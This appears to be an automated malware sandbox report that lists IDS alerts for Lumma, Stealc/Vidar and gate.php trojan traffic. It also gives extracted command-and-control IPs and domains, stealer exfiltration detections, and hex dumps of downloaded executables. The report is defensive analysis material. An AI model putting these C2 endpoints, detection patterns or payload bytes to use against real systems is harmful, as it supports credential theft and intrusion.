Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50233 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50233 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50221 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50207 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50207 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50207 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50221 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50254 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50254 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50254 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.10:50271 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50272 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50272 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50265 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.10:50259 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50265 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50265 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.10:50255 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50288 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50275 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50275 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50272 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.10:50263 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50258 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50258 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50288 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50288 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.10:50299 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50275 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50261 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50261 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50268 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50268 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50268 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50261 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.10:50205 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50316 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50316 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50316 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.10:50308 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50294 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50294 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50294 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.10:50284 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50311 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50311 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50296 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50319 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50311 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50319 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50319 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50300 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50300 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50300 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50329 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50329 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50329 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50339 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50339 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50339 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50330 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50330 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50332 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50330 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50332 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50332 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50243 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50243 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50243 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2058159 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fightlsoser .click) : 192.168.2.10:59721 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50258 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.10:50238 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50337 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50337 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.10:50267 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50337 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50296 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50296 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50302 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50302 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50302 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.10:50079 -> 116.203.10.31:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.10.31:443 -> 192.168.2.10:50079
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.10.31:443 -> 192.168.2.10:50088
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:50259 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:50259 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:50267 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:50238 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:50238 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.10:50299 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:50308 -> 172.67.213.48:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 185.81.68.147 80
Source: C:\Windows\explorer.exe	Domain query: support.mozilla.org

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 185.215.113.43
Source: Malware configuration extractor	URLs: 185.81.68.147:1912

Contains functionality to determine the online IP of the system

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F33CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, IPInfoFetcher	9_2_00007FF643F33CE0
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F33CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, https://ipinfo.io/json	9_2_00007FF643F33CE0
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684573CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, IPInfoFetcher	11_2_00007FF684573CE0
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684573CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, https://ipinfo.io/json	11_2_00007FF684573CE0
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD73CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, IPInfoFetcher	13_2_00007FF61DD73CE0
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD73CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, https://ipinfo.io/json	13_2_00007FF61DD73CE0

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.10:49987 -> 185.81.68.147:1912

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:48:11 GMTContent-Type: application/octet-streamContent-Length: 605696Last-Modified: Thu, 12 Dec 2024 15:01:11 GMTConnection: keep-aliveETag: "675afab7-93e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d 93 ba 99 09 f2 d4 ca 09 f2 d4 ca 09 f2 d4 ca 42 8a d7 cb 0c f2 d4 ca 42 8a d1 cb b6 f2 d4 ca 19 76 d7 cb 03 f2 d4 ca 19 76 d0 cb 18 f2 d4 ca 42 8a d2 cb 08 f2 d4 ca 19 76 d1 cb 63 f2 d4 ca 52 9a d5 cb 0b f2 d4 ca 42 8a d0 cb 12 f2 d4 ca 42 8a d5 cb 18 f2 d4 ca 09 f2 d5 ca cf f2 d4 ca 42 77 dd cb 0c f2 d4 ca 42 77 2b ca 08 f2 d4 ca 09 f2 43 ca 08 f2 d4 ca 42 77 d6 cb 08 f2 d4 ca 52 69 63 68 09 f2 d4 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 31 b5 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 ee 06 00 00 6c 02 00 00 00 00 00 0c 32 04 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 08 00 b4 00 00 00 00 60 09 00 48 04 00 00 00 10 09 00 74 4c 00 00 00 00 00 00 00 00 00 00 00 70 09 00 90 0b 00 00 80 04 08 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 06 08 00 28 00 00 00 40 03 08 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 07 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3e ec 06 00 00 10 00 00 00 ee 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 ce 01 00 00 00 07 00 00 d0 01 00 00 f2 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 3b 00 00 00 d0 08 00 00 1c 00 00 00 c2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 74 4c 00 00 00 10 09 00 00 4e 00 00 00 de 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 48 04 00 00 00 60 09 00 00 06 00 00 00 2c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 90 0b 00 00 00 70 09 00 00 0c 00 00 00 32 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:48:17 GMTContent-Type: application/octet-streamContent-Length: 605696Last-Modified: Thu, 12 Dec 2024 15:01:25 GMTConnection: keep-aliveETag: "675afac5-93e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d 93 ba 99 09 f2 d4 ca 09 f2 d4 ca 09 f2 d4 ca 42 8a d7 cb 0c f2 d4 ca 42 8a d1 cb b6 f2 d4 ca 19 76 d7 cb 03 f2 d4 ca 19 76 d0 cb 18 f2 d4 ca 42 8a d2 cb 08 f2 d4 ca 19 76 d1 cb 63 f2 d4 ca 52 9a d5 cb 0b f2 d4 ca 42 8a d0 cb 12 f2 d4 ca 42 8a d5 cb 18 f2 d4 ca 09 f2 d5 ca cf f2 d4 ca 42 77 dd cb 0c f2 d4 ca 42 77 2b ca 08 f2 d4 ca 09 f2 43 ca 08 f2 d4 ca 42 77 d6 cb 08 f2 d4 ca 52 69 63 68 09 f2 d4 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 31 b5 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 ee 06 00 00 6c 02 00 00 00 00 00 0c 32 04 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 08 00 b4 00 00 00 00 60 09 00 48 04 00 00 00 10 09 00 74 4c 00 00 00 00 00 00 00 00 00 00 00 70 09 00 90 0b 00 00 80 04 08 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 06 08 00 28 00 00 00 40 03 08 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 07 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3e ec 06 00 00 10 00 00 00 ee 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 ce 01 00 00 00 07 00 00 d0 01 00 00 f2 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 3b 00 00 00 d0 08 00 00 1c 00 00 00 c2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 74 4c 00 00 00 10 09 00 00 4e 00 00 00 de 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 48 04 00 00 00 60 09 00 00 06 00 00 00 2c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 90 0b 00 00 00 70 09 00 00 0c 00 00 00 32 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
